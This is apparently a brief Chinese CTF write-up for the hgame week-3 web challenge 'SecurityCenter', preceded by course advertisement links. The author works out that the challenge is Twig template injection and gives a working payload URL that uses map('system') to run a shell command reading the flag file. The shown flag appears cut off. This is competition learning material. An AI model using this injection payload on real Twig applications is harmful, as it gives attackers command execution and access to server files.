hgame-week3-web-wp
Python微信订餐小程序课程视频
https://edu.csdn.net/course/detail/36074
Python实战量化交易理财系统
https://edu.csdn.net/course/detail/35475
hgame第三周(web ak)
1.SecurityCenter
先看看hint(**vendor是第三方库和插件放置的文件夹,一般来源于composer的安装)
找到了使用的twig模板,应该是twig模板注入
查博客
依葫芦画瓢http://146.56.223.34:60036/redirect.php?url={{[“base64 /flag”]|map(“system”)}}
进入了安全中心,应该不用点跳转了,Array前面就是base64编码(习惯了base都用basecrack免得套娃)
hgame{!Tw19-S5t11s^s00O
共有 0 条评论